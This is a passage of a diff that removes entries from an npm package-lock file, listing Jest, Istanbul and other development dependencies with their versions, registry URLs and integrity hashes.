"https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=", - "dev": true - }, - "create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - } - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dev": true, - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "requires": {} - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "dev": true, - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "requires": { - "jake": "^10.8.5" - } - }, - "electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", - "dev": true - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "dev": true - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", - "dev": true - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "requires": { - "minimatch": "^5.0.1" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0" - } - }, - "minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "requires": { - "brace-expansion": "^2.0.1" - } - } - } - }, - "fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "dev": true - }, - "fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dev": true, - "requires": { - "minipass": "^3.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=", - "dev": true - }, - "fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dev": true, - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", - "dev": true - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "dev": true, - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "requires": { - "function-bind": "^1.1.2" - } - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "dev": true, - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "requires": { - "hasown": "^2.0.2" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "dev": true, - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jake": { - "version": "10.9.2", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", - "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", - "dev": true, - "requires": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - } - }, - "jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - } - }, - "jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": 